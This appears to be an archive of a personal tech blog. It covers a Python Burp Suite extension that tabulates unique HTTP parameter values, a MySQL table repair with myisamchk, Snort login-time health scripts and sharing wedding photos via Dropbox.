        <span style="color: #007020;">self</span><span style="color: #666666;">.</span>_helpers <span style="color: #666666;">=</span> callbacks<span style="color: #666666;">.</span>getHelpers()
        <span style="color: #60a0b0; font-style: italic;"># set our extension name</span>
        callbacks<span style="color: #666666;">.</span>setExtensionName(<span style="color: #4070a0;">"Unique Parameter Values"</span>)
        callbacks<span style="color: #666666;">.</span>registerContextMenuFactory(<span style="color: #007020;">self</span>)
        <span style="color: #007020; font-weight: bold;">return</span>

    <span style="color: #60a0b0; font-style: italic;"># implement IContextMenuFactory: remember the invocation so the helper can</span>
    <span style="color: #60a0b0; font-style: italic;"># read the selected messages later, and hand Burp our single menu item</span>
    <span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">createMenuItems</span>(<span style="color: #007020;">self</span>, ctxMenuInvocation):
        <span style="color: #007020;">self</span><span style="color: #666666;">.</span>ctxMenuInvocation <span style="color: #666666;">=</span> ctxMenuInvocation
        <span style="color: #007020; font-weight: bold;">return</span> [<span style="color: #007020;">self</span><span style="color: #666666;">.</span>menuItem]
</span></pre>
</div>
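<p style="text-align: left;">One caveat with the pattern above: reload(UniqueParamValues) sits outside the try, so a syntax error in the helper file raises from the reload call itself and never reaches the except that prints the traceback. The block below is an added example, not code from this post: it reproduces the edit-reload-run cycle in plain Python 3 (importlib.reload standing in for Jython's builtin reload), using a throwaway helper module written to a temporary directory, and puts the reload inside the try. The module name, the helper function and the three source versions are mine.</p>

```python
import functools
import importlib
import os
import sys
import tempfile
import traceback
import uuid

# Python normally caches bytecode next to the source. A helper rewritten within
# the same second, to the same size, can then be served stale by reload().
# Not writing bytecode at all avoids that while iterating on a module.
sys.dont_write_bytecode = True

# Constructed helper sources: a working version and one missing a colon.
GOOD_SOURCE = "def get_unique(values):\n    return sorted(set(values))\n"
BROKEN_SOURCE = "def get_unique(values)\n    return sorted(set(values))\n"


def write_helper(directory, name, source):
    """Save the helper module to disk, as an editor would after each change."""
    path = os.path.join(directory, name + ".py")
    with open(path, "w") as fh:
        fh.write(source)
    return path


def run_with_reload(directory, name, values):
    """Counterpart of the extension's actionPerformed(): reload the helper,
    call into it, and return ("ok", result) or ("error", traceback text).

    The reload is inside the try, so a syntax error in the helper file is
    reported through the same traceback path as a runtime error inside it.
    """
    if directory not in sys.path:
        sys.path.insert(0, directory)
    try:
        if name in sys.modules:
            # Jython 2.x: the builtin reload(module) does the same job.
            module = importlib.reload(sys.modules[name])
        else:
            module = importlib.import_module(name)
        return ("ok", module.get_unique(values))
    except Exception:
        return ("error", traceback.format_exc())


@functools.lru_cache(maxsize=None)
def demo_results():
    """Run the edit/reload/run cycle three times: good, broken, fixed."""
    directory = tempfile.mkdtemp()
    name = "helper_%s" % uuid.uuid4().hex[:8]  # hypothetical module name
    values = ["b", "a", "b"]
    results = []
    for source in (GOOD_SOURCE, BROKEN_SOURCE, GOOD_SOURCE):
        write_helper(directory, name, source)
        results.append(run_with_reload(directory, name, values))
    return results


if __name__ == "__main__":
    for status, payload in demo_results():
        print(status)
        print(payload)
```

<p style="text-align: left;">Running the file shows the sequence a developer sees in Burp's extension output: a result, then a SyntaxError traceback pointing at the helper file, then a result again once the file is fixed, all without restarting the host process.</p>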
<span style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-family: Arial;"> </span><br />
<span style="font-family: Arial;"> </span>
<br /><strong><u>Step 3</u></strong></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: Arial, Helvetica, sans-serif;">And finally, I created a file that would contain the customized functions needed in my extension (UniqueParamValues.py), and dropped that file in the c:\python\lib directory. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> </span></span><br />
<br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">getUniqueParams</span>(<span style="color: #007020;">self</span>):
    <span style="color: #60a0b0; font-style: italic;"># Initialize lists</span>
    parameter_array <span style="color: #666666;">=</span> []
    parameter_string_array <span style="color: #666666;">=</span> []
    messages <span style="color: #666666;">=</span> <span style="color: #007020;">self</span><span style="color: #666666;">.</span>ctxMenuInvocation<span style="color: #666666;">.</span>getSelectedMessages()
    <span style="color: #60a0b0; font-style: italic;"># This for loop iterates through all of the selected messages pulling out </span>
    <span style="color: #60a0b0; font-style: italic;"># everything Burp considers a parameter (even cookies), and putting all of </span>
    <span style="color: #60a0b0; font-style: italic;"># the parameters in a list</span>
    <span style="color: #007020; font-weight: bold;">for</span> m <span style="color: #007020; font-weight: bold;">in</span> messages:
        request_byte_array <span style="color: #666666;">=</span> m<span style="color: #666666;">.</span>getRequest()
        requestInfo <span style="color: #666666;">=</span> <span style="color: #007020;">self</span><span style="color: #666666;">.</span>_helpers<span style="color: #666666;">.</span>analyzeRequest(request_byte_array)
        parameters <span style="color: #666666;">=</span> requestInfo<span style="color: #666666;">.</span>getParameters()
        <span style="color: #60a0b0; font-style: italic;"># extend() accepts the java.util.List that Burp hands back</span>
        parameter_array<span style="color: #666666;">.</span>extend(parameters)
    <span style="color: #60a0b0; font-style: italic;"># This for loop iterates through each parameter and creates a string of the </span>
    <span style="color: #60a0b0; font-style: italic;"># form paramname=paramvalue, so that they can be compared and sorted later. </span>
    <span style="color: #007020; font-weight: bold;">for</span> p <span style="color: #007020; font-weight: bold;">in</span> parameter_array:
        param_string <span style="color: #666666;">=</span> p<span style="color: #666666;">.</span>getName() <span style="color: #666666;">+</span> <span style="color: #4070a0;">"="</span> <span style="color: #666666;">+</span> p<span style="color: #666666;">.</span>getValue()
        <span style="color: #60a0b0; font-style: italic;">#print "Param String:", param_string</span>
        parameter_string_array<span style="color: #666666;">.</span>append(param_string)
    <span style="color: #60a0b0; font-style: italic;"># After the for loop is finished, uniquify and sort the parameters -- the main purpose of the extension</span>
    unique_parameters <span style="color: #666666;">=</span> <span style="color: #007020;">sorted</span>(uniqify(<span style="color: #007020;">self</span>, parameter_string_array))
    <span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"************************************************************"</span>
    <span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"******************** Unique Parameters *********************"</span>
    <span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"************************************************************"</span>
    <span style="color: #007020; font-weight: bold;">print</span>
    <span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"Number of Parameters:"</span>, <span style="color: #007020;">len</span>(parameter_string_array)
    <span style="color: #007020; font-weight: bold;">print</span> <span style="color: #4070a0;">"Number of Unique Parameters:"</span>, <span style="color: #007020;">len</span>(unique_parameters)
    <span style="color: #007020; font-weight: bold;">print</span>
    param_dict <span style="color: #666666;">=</span> {}
    <span style="color: #007020; font-weight: bold;">for</span> unique_param <span style="color: #007020; font-weight: bold;">in</span> unique_parameters:
        <span style="color: #60a0b0; font-style: italic;">#print "Param: %s" % (unique_param)</span>
        <span style="color: #60a0b0; font-style: italic;"># Split on the first "=" only: a value (base64, nested query strings) may itself contain "="</span>
        param_name, param_value <span style="color: #666666;">=</span> unique_param<span style="color: #666666;">.</span>split(<span style="color: #4070a0;">"="</span>, <span style="color: #40a070;">1</span>)
        <span style="color: #60a0b0; font-style: italic;">#This if statement creates a dictionary, but unlike a normal dictionary, the value of each key is a list.</span>
        <span style="color: #60a0b0; font-style: italic;">#This is so that I can use the append function. </span>
        <span style="color: #60a0b0; font-style: italic;">#The key is the parameter name</span>
        <span style="color: #60a0b0; font-style: italic;">#The value is a list of all of the unique values seen for that parameter</span>
        <span style="color: #007020; font-weight: bold;">if</span> param_name <span style="color: #007020; font-weight: bold;">not</span> <span style="color: #007020; font-weight: bold;">in</span> param_dict:
            param_dict[param_name] <span style="color: #666666;">=</span> []
        param_dict[param_name]<span style="color: #666666;">.</span>append(param_value)
    <span style="color: #007020; font-weight: bold;">for</span> key, value <span style="color: #007020; font-weight: bold;">in</span> param_dict<span style="color: #666666;">.</span>iteritems():
        <span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #007020;">len</span>(key) <span style="color: #666666;">*</span> <span style="color: #4070a0;">"-"</span> <span style="color: #666666;">+</span> <span style="color: #4070a0;">"----"</span>)
        <span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #4070a0;">"| </span><span style="color: #70a0d0; font-style: italic;">%s</span><span style="color: #4070a0;"> |"</span> <span style="color: #666666;">%</span> (key))
        <span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #007020;">len</span>(key) <span style="color: #666666;">*</span> <span style="color: #4070a0;">"-"</span> <span style="color: #666666;">+</span> <span style="color: #4070a0;">"----"</span>)
        <span style="color: #007020; font-weight: bold;">for</span> item <span style="color: #007020; font-weight: bold;">in</span> value:
            <span style="color: #007020; font-weight: bold;">print</span>(item)
        <span style="color: #007020; font-weight: bold;">print</span>(<span style="color: #4070a0;">"</span><span style="color: #4070a0; font-weight: bold;">\n\n\n\n</span><span style="color: #4070a0;">"</span>)

<span style="color: #007020; font-weight: bold;">def</span> <span style="color: #06287e;">uniqify</span>(<span style="color: #007020;">self</span>, parameter_string_array):
    <span style="color: #60a0b0; font-style: italic;"># not order preserving; the caller sorts the result</span>
    <span style="color: #007020; font-weight: bold;">return</span> <span style="color: #007020;">list</span>(<span style="color: #007020;">set</span>(parameter_string_array))
</pre>
</div>
<span style="font-family: Arial;">As you can see in the snippet above, this file does not require any additional imports. You just define the functions, receive the arguments, process them, and then optionally return the result to the caller. This extension is far from complete, and is the first python I have written in a year, so please don't judge me :). </span><br />
<span style="font-family: Arial;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: Arial, Helvetica, sans-serif;">Regardless, I wanted to put it up here as an example of how to quickly develop and debug a Burp Extension with Python. </span></span><br />
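<p style="text-align: left;">The logic in UniqueParamValues.py only runs inside Burp, which makes it awkward to check a change before reloading it. The following is an added example, not code from this post or from Burp: a plain Python 3 stand-in for the same aggregation that pulls parameters out of constructed raw HTTP requests (query string, urlencoded body and Cookie header, roughly what analyzeRequest().getParameters() yields), then builds the name-to-unique-values table the extension prints. It splits name=value on the first "=" only, so a value that itself contains "=" survives intact. The sample requests and all function names are mine.</p>

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic, standing in for the messages selected in Burp.
SAMPLE_REQUESTS = [
    "GET /board?board_id=2&page=2 HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: __utmc=194279098; sess=abc\r\n"
    "\r\n",
    "GET /board?board_id=2&page=3 HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: __utmc=194279098; sess=abc\r\n"
    "\r\n",
    "POST /post HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: sess=abc\r\n"
    "\r\n"
    "board_id=2&csrf_token=null&next=/a?b=c",
]


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def extract_parameters(raw):
    """(name, value) pairs from the query string, a urlencoded body and the
    Cookie header: the plain-Python counterpart of Burp's parameter list."""
    _method, target, headers, body = parse_request(raw)
    params = list(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    content_type = headers.get("content-type", "")
    if body and content_type.startswith("application/x-www-form-urlencoded"):
        params.extend(parse_qsl(body, keep_blank_values=True))
    for cookie in headers.get("cookie", "").split(";"):
        cookie = cookie.strip()
        if cookie:
            # partition splits once, so "=" inside the value is preserved
            name, _, value = cookie.partition("=")
            params.append((name, value))
    return params


def unique_param_values(raw_requests):
    """Map each parameter name to the sorted list of distinct values seen."""
    seen = {}
    for raw in raw_requests:
        for name, value in extract_parameters(raw):
            seen.setdefault(name, set()).add(value)
    return {name: sorted(values) for name, values in seen.items()}


def summarize(raw_requests):
    """(total parameters, unique name=value pairs): the two counts the
    extension prints above its table."""
    pairs = [name + "=" + value
             for raw in raw_requests
             for name, value in extract_parameters(raw)]
    return len(pairs), len(set(pairs))


def render_table(unique):
    """Same boxed layout as the extension's stdout output."""
    lines = []
    for name in sorted(unique):
        bar = "-" * (len(name) + 4)
        lines.extend([bar, "| %s |" % name, bar])
        lines.extend(unique[name])
    return "\n".join(lines)


if __name__ == "__main__":
    total, distinct = summarize(SAMPLE_REQUESTS)
    print("Number of Parameters:", total)
    print("Number of Unique Parameters:", distinct)
    print(render_table(unique_param_values(SAMPLE_REQUESTS)))
```

<p style="text-align: left;">The functions can be exercised from a Python shell or a unit test against captured requests before the module is copied into Burp's module directory; only the message-fetching line at the top of getUniqueParams() is Burp-specific.</p>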
<br />
If you are curious, at this point, the extension spits out a table in stdout that looks like this:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">************************************************************<br />******************** Unique Parameters *********************<br />************************************************************</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">Number of Parameters: 40<br />Number of Unique Parameters: 12</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">--------------<br />| csrf_token |<br />--------------<br />null<br />------------<br />| board_id |<br />------------<br />2<br />----------<br />| __utmb |<br />----------<br />194279098.1.10.1389713652<br />----------<br />| __utmc |<br />----------<br />194279098<br />----------<br />| __utmz |<br />----------<br />194279098.1389713652.1.1.utmcsr<br />----------<br />| __utma |<br />----------<br />194279098.364032451.1389713652.1389713652.1389713652.1<br />--------<br />| page |<br />--------<br />2<br />3<br />4<br />5<br />6</span><br />
<br />
My goal is to eventually create a window in Burp that will contain this information, as well as counts for each parameter value. </span>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-70589002857589592002014-01-13T15:37:00.002-05:002014-01-13T15:39:36.951-05:00Re-launch - A focus on Web Application Pen Testing, Burp Extensions, etc<span style="font-family: Arial, sans-serif;">It has been quite a while
since my last blog post here. Not that I have ever really blogged much, but
in 2010, I officially switched from a world filled with enterprise firewalls
and intrusion detection systems to one filled with Web Applications (and other
types of applications). </span><br />
<br />
<span style="font-family: Arial, sans-serif;">On one hand, for someone who
likes to learn, Web Application Penetration Testing is perfect: there are so many
languages, frameworks, best practices, and common mistakes to understand that, as a tester, you will never run out of things to learn. Of course, that also means that
you will never come close to learning it all. Left
unmanaged, this can be a source of frustration and despair. </span><br />
<br />
<span style="font-family: Arial, sans-serif;">The main point of this blog re-launch is that it has been far too long since I have written any code. I'd like to document the mistakes I make, and the lessons I am bound to learn, as I jump back into things. </span><br />
<br />
<span style="font-family: Arial, sans-serif;">I
mainly test applications from a Windows OS, so those thousands of hours of BASH
scripting experience from my past are just sitting in my brain as memories. I
was also just starting to become functional in Python when I essentially
abandoned that as well. I have found a few things to automate over the last few
years, but to be honest, most times I think of something related to application
testing that I can automate in Python, I realize that Portswigger's Burp Suite
already does that. I can't tell you how many times this has happened. </span><br />
<br />
<span style="font-family: Arial, sans-serif;">Of course, the problem with
relying on a tool to do something for you is that if you need it to do
something slightly differently, you are stuck. This is where the Burp Extension
API comes into play.</span><br />
<br />
<span style="font-family: Arial, sans-serif;">Recently, I have done a
number of assessments on custom applications (mostly thick clients written in
Java, C#, etc.) that use web services to communicate with the server. While
these applications use HTTP(S) and can be intercepted with Burp, their implementations
are unique, and it becomes difficult to analyze the requests with the default
Burp functionality. </span><br />
<br />
<span style="font-family: Arial, sans-serif;">This is, of course, the perfect opportunity
for me to extend Burp Suite to make it do things that only I need it to do,
while at the same time an opportunity for me to dust off my
scripting/programming skills.</span><br />
<br />
<span style="font-family: Arial, sans-serif;">The next few posts, at least, will contain Burp Extension related info. They will hopefully show me improving from noob to moderately functional. We'll see... </span>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-7159442416873556252009-10-27T12:11:00.003-04:002009-10-27T12:19:48.392-04:00Use dropbox to collect wedding photos (or any other group photos) with friends and familyAfter my wedding, I searched for hours trying to find the easiest way for all my friends and family to send me their digital photos. An FTP server would have worked, but would have been slightly more intimidating to the non-technical folk. I decided that a shared dropbox account was the perfect solution, and it worked out even better than I could have imagined. I received 1900 unique pictures in 2 weeks!!<br /><br /><strong>I created a new account, and sent the following email to everyone who attended:<br /></strong><br />Thanks so much for making our special day an amazing one! Now that it is over, we would love to get everyone's perspective. So, we would appreciate it if you could drop your photos in our dropbox (instructions below).<br /><br />This is an account that we will all share. 
This means that you can all check back in a week and download as many pictures as you like, and it also means that you can potentially delete all the pictures everyone else has uploaded… so be careful!<br /><br /><strong>How to upload pictures:</strong><br /><br /><ol><li>Browse to this website: <a class="http" href="http://www.getdropbox.com/">http://www.getdropbox.com/</a> </li><li>Log in using this username/password combo (login is in upper right corner):<br /> Username: &lt;enter&gt;<br /> Password: &lt;enter&gt; </li><li>Once you are logged in, click on the word Photos </li><li>If you would like us to know which pictures are yours, create a folder with your name<br /> e.g.: Seth's Pics </li><li>Click on the folder you just created </li><li>Click the UPLOAD BUTTON<br /></li></ol><strong>There are three ways to upload pictures:<br /><br /></strong><br /><p>Use the mass upload feature<br /></p><ul><li>This is by far the easiest. </li><li>Click the blue button that says "Choose Files" </li><li>Hold shift and use the arrow keys to select up to 50 pictures at a time, then select "open" </li><li>Then click submit to upload them to the site!<br /></li></ul>If that doesn’t work, you can try the “Basic Uploader”<br /><ul><li> This one is much slower because you have to select one file at a time, like in most email clients. If the first option doesn’t work, I recommend going to the third. </li></ul><p>Install the software package on your computer </p><ul><li>Hit cancel, and then go to the “Install” link on the top right of the page. </li><li>Install the software package using the same username and password from above </li><li>This will create a “sync” folder on your computer where you can just copy all of the files from the original folder to this sync folder. Within minutes they will all upload to the server automatically! 
</li><li>*** This means that every picture someone else uploads will also automatically sync to your computer, so be mindful that this can eat up all of your bandwidth and/or hard drive space. ***<br /></li></ul><p>Thanks again! </p>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com1tag:blogger.com,1999:blog-5890567984672491244.post-42997789342658613072008-06-11T20:55:00.005-04:002008-06-11T22:19:46.587-04:00Mysql fixI don't believe this post will be very useful to anyone else, but I want to record it anyway. I noticed a few weeks ago that my drupal installation was complaining that the watchdog table had crashed. With my limited understanding of mysql, I didn't even know that a table *could* crash. Everything else on the site looked fine to the anonymous user, so I just ignored it.<br /><br />That brings me to today. I found this interesting script online that will dump all of my mysql databases every hour to another file system. I figured I would give it a shot. I entered my root db password and the dst directory and let her rip. 
I got a few errors right away:<br /><br /><span style="font-family:courier new;">[root@www storage]# <strong>mysql-backup.sh</strong> </span><br /><br /><span style="font-family:courier new;">mysqldump: Error 1194: Table 'watchdog' is marked as crashed and should be repaired when dumping table `watchdog` at row: 283</span><br /><br /><span style="font-family:courier new;">mysqldump: Got error: 145: Table './drupal/watchdog' is marked as crashed and should be repaired when using LOCK TABLES</span><br /><br /><span style="font-family:courier new;">mysqldump: Got error: 145: Table './gallery2/g2_CacheMap' is marked as crashed and should be repaired when using LOCK TABLES</span><br /><br /><span style="font-size:+0;">Google quickly found the following post: <a href="http://gallery.menalto.com/node/72721">http://gallery.menalto.com/node/72721</a>, where a user kindly posted the solution to their own problem: </span><br /><br /><span style="font-family:arial;font-size:85%;">Stage 1: Checking your tables<br />Run myisamchk *.MYI or myisamchk -e *.MYI if you have more time. 
Use the -s (silent) option to suppress unnecessary information. If the mysqld server is stopped, you should use the --update-state option to tell myisamchk to mark the table as “checked.” You have to repair only those tables for which myisamchk announces an error. For such tables, proceed to Stage 2. If you get unexpected errors when checking (such as out of memory errors), or if myisamchk crashes, go to Stage 3.<br />Stage 2: Easy safe repair<br />First, try myisamchk -r -q tbl_name (-r -q means “quick recovery mode”). This attempts to repair the index file without touching the data file. 
If the data file contains everything that it should and the delete links point at the correct locations within the data file, this should work, and the table is fixed.<br />source: </span><a class="bb-url" href="http://dev.mysql.com/doc/refman/5.0/en/repair.html" rel="nofollow"><span style="font-family:arial;font-size:85%;">Website</span></a><br /><br /><span style="font-family:courier new;">[root@www storage]# <strong>myisamchk -r -q /var/lib/mysql/drupal/watchdog.MYI</strong></span><br /><br /><span style="font-family:courier new;">- check record delete-chain</span><br /><br /><span style="font-family:courier new;">- recovering (with sort) MyISAM-table '/var/lib/mysql/drupal/watchdog.MYI'<br />Data records: 513</span><br /><br /><span style="font-family:courier new;">- Fixing index 1</span><br /><br /><span style="font-family:courier new;">Found block that points outside data file at 122592</span><br /><br /><span style="font-family:courier new;">MyISAM-table '/var/lib/mysql/drupal/watchdog.MYI' is not fixed because of errors</span><br /><br /><span style="font-family:courier new;">Try fixing it by using the --safe-recover (-o), the --force (-f) option or by not using the --quick (-q) flag</span><br /><br />
<span style="font-family:courier new;">[root@www storage]# <strong>myisamchk -r /var/lib/mysql/drupal/watchdog.MYI</strong></span><br /><br /><span style="font-family:courier new;">- recovering (with sort) MyISAM-table '/var/lib/mysql/drupal/watchdog.MYI'</span><br /><br /><span style="font-family:courier new;">Data records: 513</span><br /><br /><span style="font-family:courier new;">- Fixing index 1</span><br /><br /><span style="font-family:courier new;">Found block that points outside data file at 122592</span><br /><br /><span style="font-family:courier new;">- Fixing index 2</span><br /><br />As you can see, I had to get rid of the -q option to get it to work, but it did in fact work. The same command worked to fix g2_CacheMap, but that one took quite a bit longer.<br /><br />Looks like that did the trick.Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com3tag:blogger.com,1999:blog-5890567984672491244.post-11862669803225365182008-06-06T13:14:00.005-04:002008-06-11T21:10:47.080-04:00Some snort login kung-fu...<div align="left">I was recently playing around with my .bash_profile file looking for new ways to alert myself as well as my team to problems with production snorts. 
I ended up with two little tricks that I have found really useful and I figured I would share.<br /><br />For those that don't know, the .bash_profile file is an sh script that runs at user login. At a bare minimum it sets the users PATH, but it can be used for a whole lot more. It's located in the root of the users home directory. Ex: /home/snort/.bash_profile, or /root/.bash_profile<br /><br />Before I go any further I will tell you that both of these tricks are obviously reactive in nature. They only let you know there is a problem the next time you log into the device. A more proactive solution would involve setting thresholds and sending emails to admins, but 1) there are already plenty of scripts that do that, and 2) that is not a luxury I have on my sensors. I have inbound ssh, outbound 80 for updates and outbound 443 for logging.<br /><br />Nevertheless, this reactive approach is much cooler than nothing at all and I think it would still be helpful on any snort installation no matter what other active health monitoring is in place.<br /><br /><strong><span style="font-size:130%;">Display most recent snort signatures on login</span></strong></div><strong></strong><div align="left"><br />The first function I added to .bash_profile is called checksnortsigs(). It sorts the files in /etc/snort/rules by date order, and grabs the date of the most recent .rules file. It's that simple. 
It then just prints that information when you log in and gives a little advice on what to do next:<br /><br /><span style="font-family:courier new;">checksnortsigs()<br />{<br />if [ -f /etc/init.d/snortd ]; then<br />LATESTRULE=`ls -ltr /etc/snort/rules/*.rules tail -1 awk '{print $6, $7}'`<br />echo "-------------- Snort Installation Detected -----------------"<br />echo "The most recent snort rules on this machine were updated on:"<br />echo " ******* $LATESTRULE *******"<br />echo "If the date above is more than 1 month old, run oinkmaster"<br />echo "manually and verify it completes without error."<br /></span><span style="font-family:courier new;">echo "------------------------------------------------------------"<br />echo<br />fi<br />}<br /><br />checksnortsigs</span><br /><br />Output (which is displayed as soon as the user logs in) looks like this:<br /><br /><span style="font-family:courier new;"><strong>Last login: Thu May 29 16:27:36 2008 from xxxxxxxx<br />-------------- Snort Installation Detected -----------------<br />The most recent snort rules on this machine were updated on:<br />******* May 30 *******<br />If the date above is more than 1 month old, run oinkmaster<br />manually and verify it completes without error.<br />------------------------------------------------------------<br /></strong></span><br /></div><div align="left"><strong><span style="font-size:130%;">Display % dropped packets and Mbps stats on login</span></strong></div><div align="left"><br />Shortly after that, and this came to me after playing around with sguil and seeing how nicely the snort.stats information is integrated into the analyst console, I decided that I also wanted to display recent % dropped packets and Mbps statistics each time someone logged in. 
There are a few more steps to get this one working, but they are all very easy:<br /><br />1) Enable the following line in snort.conf:<br /><br /><span style="font-family:courier new;">preprocessor perfmonitor: time 300 file /var/log/snort/snort.stats pktcnt 10000</span><br /><br />2) Restart snort<br /><br />3) I created a very simple bash script that is basically one line of code along with a bit of "usage" code to make it easier for others to run. I called it get-snort-stats.sh. I created it for the bash_profile script, but it can be used as a standalone program as well. Here it is:<br /><br /><span style="font-family:courier new;">#!/bin/bash</span><br /><span style="font-family:courier new;"># A very simple utility that will display the % dropped packets as well as throughput statistics.</span><br /><span style="font-family:courier new;"># Snort records this information every 5 minutes</span><br /><span style="font-family:courier new;"># Author: Seth Art</span><br /><span style="font-family:courier new;"># Created: May 20th, 2008</span><br /><br /><span style="font-family:courier new;">########################### </span><br /><span style="font-family:courier new;">#Usage</span><br /><span style="font-family:courier new;">###########################<br />if [ -z "$1" ]; then </span><br /><span style="font-family:courier new;">echo </span><br /><span style="font-family:courier new;">echo "Usage: get-snort-stats [number of lines to display]..." </span><br /><span style="font-family:courier new;">echo</span><br /><span style="font-family:courier new;">exit 1</span><br /><span style="font-family:courier new;">fi<br /></span><br /><span style="font-family:courier new;">case $1 in</span><br /><span style="font-family:courier new;">'-h'|'--help')</span><br /><span style="font-family:courier new;">echo</span><br /><span style="font-family:courier new;">echo "Usage: get-snort-stats [number of lines to display]..."</span><br /><span style="font-family:courier new;">echo " -h, --help display this help and exit"</span><br /><span style="font-family:courier new;">echo</span><br /><span style="font-family:courier new;">exit 1</span><br /><span style="font-family:courier new;">;;<br />esac</span><br /><br /><span style="font-family:courier new;">########################### </span><br /><span style="font-family:courier new;">#Main</span><br /><span style="font-family:courier new;">###########################<br /># snort.stats is comma separated: field 2 is % dropped packets, field 3 is Mbps<br />tail -n "$1" /var/log/snort/snort.stats | awk -F , '{print "Dropped Packets = " $2, "\t", "Mbps = "$3}'<br /></span><br /><br /><br />4) This bit ties the get-snort-stats command in with the .bash_profile script. 
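<br /><br />Added example (my own code, not from the original post): the "proactive" variant mentioned in the intro, built around the same snort.stats fields the script above reads, plus a checkable form of the "more than 1 month old" advice from checksnortsigs. It assumes the perfmonitor CSV layout the awk one-liner assumes (field 2 = % dropped, field 3 = Mbps), a constructed sample file in place of /var/log/snort/snort.stats, and a hypothetical 1.0% drop threshold; the function names are mine.<br /><br />

```shell
#!/bin/sh
# Added example, not from the original post: a threshold-aware version of the
# get-snort-stats idea plus a rules-age check, i.e. the "proactive" variant the
# post mentions but does not implement. Function names, sample data and the
# 1.0% threshold are my own assumptions, not anything shipped with Snort.
# Assumed perfmonitor layout (same as the post's awk one-liner): comma-separated,
# field 2 = % packets dropped, field 3 = Mbps; lines starting with '#' are headers.

# Constructed sample of /var/log/snort/snort.stats (one perfmonitor line per 5 minutes).
SAMPLE_STATS=$(mktemp)
cat > "$SAMPLE_STATS" <<'EOF'
#time,pkt_drop_percent,wire_mbits_per_sec.realtime
1212100000,0.000,4.672
1212100300,0.000,4.796
1212100600,2.500,4.369
1212100900,0.000,5.071
EOF

# snort_recent_stats FILE [N]: the post's one-liner, but a missing or
# non-numeric N falls back to 4 samples (20 minutes) instead of breaking tail.
snort_recent_stats() {
    n=${2:-4}
    case $n in *[!0-9]*|'') n=4 ;; esac
    grep -v '^#' "$1" | tail -n "$n" \
        | awk -F , '{printf "Dropped Packets = %s\tMbps = %s\n", $2, $3}'
}

# snort_max_drop FILE N: highest drop percentage among the last N samples.
snort_max_drop() {
    grep -v '^#' "$1" | tail -n "$2" \
        | awk -F , 'BEGIN {m = 0} $2 + 0 > m {m = $2 + 0} END {printf "%.3f\n", m}'
}

# snort_drop_alert FILE N THRESHOLD: succeed when no sample in the last N is
# above THRESHOLD percent, fail otherwise, so it can gate a warning or an email.
snort_drop_alert() {
    grep -v '^#' "$1" | tail -n "$2" \
        | awk -F , -v t="$3" '$2 + 0 > t {bad = 1} END {if (bad) exit 1; exit 0}'
}

# snort_rules_fresh DIR DAYS: "fresh" when some *.rules file in DIR changed
# within the last DAYS days, "stale" otherwise; the mtime is the same signal
# the post's ls -ltr reads, just compared against a limit instead of printed.
snort_rules_fresh() {
    if [ -n "$(find "$1" -name '*.rules' -mtime "-$2" -print 2>/dev/null | head -n 1)" ]; then
        echo fresh
    else
        echo stale
    fi
}

# snort_stats_trim FILE KEEP: keep the header lines and only the last KEEP
# samples, replacing the file atomically; an alternative to deleting it nightly.
snort_stats_trim() {
    tmp=$(mktemp) || return 1
    { grep '^#' "$1" || :; grep -v '^#' "$1" | tail -n "$2"; } > "$tmp" && mv "$tmp" "$1"
}

# Run as a script, this prints the same login banner as the post's getsnortstats().
echo "------------------------------------------------------------"
echo " Snort % Pkts dropped and mbits/sec for the last 20 minutes "
snort_recent_stats "$SAMPLE_STATS" 4
snort_drop_alert "$SAMPLE_STATS" 4 1.0 \
    || echo " WARNING: a sample above 1.0% dropped packets; check the sensor"
echo "------------------------------------------------------------"
```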
